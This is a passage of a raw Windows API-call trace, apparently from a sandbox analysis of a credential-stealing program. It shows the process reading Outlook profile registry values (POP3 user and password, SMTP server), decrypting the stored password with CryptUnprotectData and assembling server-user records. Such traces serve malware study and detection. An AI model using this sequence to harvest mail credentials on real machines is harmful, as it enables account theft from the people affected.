GetProcessHeap () returned 0x560000 [0186.984] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.984] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617250, Size=0xd) returned 0x617160 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617190 [0186.984] GetProcAddress (hModule=0x7ffb26090000, lpProcName="CharLowerA") returned 0x7ffb260ba5f0 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617250 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617190 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617190, Size=0xf) returned 0x6171e0 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171e0, Size=0x27) returned 0x613080 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617250 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617190 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617190, Size=0x13) returned 0x615d60 [0186.984] GetProcessHeap () returned 0x560000 [0186.984] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617190 [0186.985] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetLastError") returned 0x7ffb2624b730 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.985] SetLastError (dwErrCode=0x0) [0186.985] GetProcessHeap () returned 0x560000 [0186.985] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617190 [0186.985] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.985] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x231f2b8 | out: phkResult=0x231f2b8*=0x21c) returned 0x0 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615c60 [0186.985] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.985] RegQueryValueExA (in: hKey=0x21c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x231f2b0, lpData=0x231f2d0, lpcbData=0x231f2e8*=0x4 | out: lpType=0x231f2b0*=0x0, lpData=0x231f2d0*=0x0, lpcbData=0x231f2e8*=0x4) returned 0x2 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x560000) returned 1 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617190 [0186.985] GetProcessHeap () returned 0x560000 [0186.985] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0186.986] GetProcessHeap () returned 0x560000 [0186.986] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171e0, Size=0x13) returned 0x615d60 [0186.986] GetProcessHeap () returned 0x560000 [0186.986] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0186.986] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0186.986] GetProcessHeap () returned 0x560000 [0186.986] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.986] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x220) returned 0x0 [0186.986] GetProcessHeap () returned 0x560000 [0186.986] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615da0 [0186.986] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.986] GetProcessHeap () returned 0x560000 [0186.986] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.986] RegQueryValueExA (in: hKey=0x220, lpValueName="POP3 User", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x1, lpData=0x0, lpcbData=0x231f2a4*=0xf) returned 0x0 [0186.986] GetProcessHeap () returned 0x560000 [0186.987] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0186.987] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.987] GetProcessHeap () returned 0x560000 [0186.987] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.987] GetProcessHeap () returned 0x560000 [0186.987] GetProcessHeap () returned 0x560000 [0186.987] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.987] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.987] GetProcessHeap () returned 0x560000 [0186.987] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.987] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x10) returned 0x617250 [0186.987] GetProcessHeap () returned 0x560000 [0186.987] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615da0 [0186.987] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.988] RegQueryValueExA (in: hKey=0x220, lpValueName="POP3 User", lpReserved=0x0, lpType=0x231f2a8, lpData=0x617250, lpcbData=0x231f2a4*=0xf | out: lpType=0x231f2a8*=0x1, lpData="achoo@gdllo.de", lpcbData=0x231f2a4*=0xf) returned 0x0 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.988] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.988] RegCloseKey (hKey=0x220) returned 0x0 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x560000) returned 1 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x617150 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x613080, Size=0x47) returned 0x620640 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617150 [0186.988] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.988] lstrlenA (lpString="pop3://pop.gdllo.de|achoo@gdllo.de") returned 34 [0186.988] GetProcessHeap () returned 0x560000 [0186.988] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0186.989] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.989] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.989] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620640, Size=0x23) returned 0x613080 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x400) returned 0x653d40 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6171e0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617150 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x1b) returned 0x615ee0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f60 [0186.989] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0186.989] RegQueryValueExA (in: hKey=0x218, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x231f370, lpData=0x653d40, lpcbData=0x231f330*=0x400 | out: lpType=0x231f370*=0x3, lpData=0x653d40*, lpcbData=0x231f330*=0x121) returned 0x0 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ee0 | out: hHeap=0x560000) returned 1 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.989] GetProcessHeap () returned 0x560000 [0186.989] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617150 [0186.990] GetProcessHeap () returned 0x560000 [0186.990] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13) returned 0x615e00 [0186.990] GetProcAddress (hModule=0x7ffb253c0000, lpProcName="CryptUnprotectData") returned 0x7ffb253d87a0 [0186.990] GetProcessHeap () returned 0x560000 [0186.990] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x560000) returned 1 [0186.990] CryptUnprotectData (in: pDataIn=0x231f260, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x231f270 | out: ppszDataDescr=0x0, pDataOut=0x231f270) returned 1 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617190 [0187.000] lstrlenW (lpString="asdfghjklqwer1234") returned 17 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x14) returned 0x615ea0 [0187.000] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0187.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="asdfghjklqwer1234", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0187.000] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] GetProcessHeap () returned 0x560000 [0187.000] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0187.001] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.001] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617190, Size=0x12) returned 0x615de0 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x14) returned 0x615dc0 [0187.001] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x560000) returned 1 [0187.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="asdfghjklqwer1234", cchWideChar=17, lpMultiByteStr=0x615de0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="asdfghjklqwer1234", lpUsedDefaultChar=0x0) returned 17 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615c60 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615de0 | out: hHeap=0x560000) returned 1 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x12) returned 0x615ee0 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6171e0 [0187.001] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LocalFree") returned 0x7ffb2624dd10 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.001] LocalFree (hMem=0x616c90) returned 0x0 [0187.001] lstrlenA (lpString="\r\n") returned 2 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6171e0 [0187.001] lstrcpyA (in: lpString1=0x6171e0, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0187.001] lstrlenA (lpString="|") returned 1 [0187.001] GetProcessHeap () returned 0x560000 [0187.001] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0187.002] lstrcpyA (in: lpString1=0x617150, lpString2="|" | out: lpString1="|") returned="|" [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617190 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617190, Size=0x25) returned 0x613440 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13) returned 0x615dc0 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615dc0, Size=0x29) returned 0x6130b0 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x613080, Size=0x6d) returned 0x6109a0 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.002] GetProcessHeap () returned 0x560000 [0187.002] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617130, Size=0x6d) returned 0x654270 [0187.004] GetProcessHeap () returned 0x560000 [0187.004] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ee0 | out: hHeap=0x560000) returned 1 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653d40 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6109a0 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610920 | out: hHeap=0x560000) returned 1 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x62) returned 0x610920 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617130 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617150 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617160 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171e0, Size=0x17) returned 0x615c60 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617180 [0187.005] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.005] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x230) returned 0x0 [0187.005] GetProcessHeap () returned 0x560000 [0187.005] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f40 [0187.006] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0187.006] RegQueryValueExA (in: hKey=0x230, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x0, lpData=0x0, lpcbData=0x231f2a4*=0x0) returned 0x2 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0187.006] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.006] RegCloseKey (hKey=0x230) returned 0x0 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610920 | out: hHeap=0x560000) returned 1 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x62) returned 0x610920 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617190 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617210 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617160 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617160, Size=0x17) returned 0x615c60 [0187.006] GetProcessHeap () returned 0x560000 [0187.006] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0187.007] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.008] GetProcessHeap () returned 0x560000 [0187.008] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.008] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x230) returned 0x0 [0187.008] GetProcessHeap () returned 0x560000 [0187.008] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615ce0 [0187.008] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x560000) returned 1 [0187.009] RegQueryValueExA (in: hKey=0x230, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x1, lpData=0x0, lpcbData=0x231f2a4*=0xe) returned 0x0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617150 [0187.009] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0187.009] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.009] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617130, Size=0xf) returned 0x617150 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615e40 [0187.009] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x560000) returned 1 [0187.009] RegQueryValueExA (in: hKey=0x230, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x617150, lpcbData=0x231f2a4*=0xe | out: lpType=0x231f2a8*=0x1, lpData="smtp.gdllo.de", lpcbData=0x231f2a4*=0xe) returned 0x0 [0187.009] GetProcessHeap () returned 0x560000 [0187.009] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0187.010] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.010] RegCloseKey (hKey=0x230) returned 0x0 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, 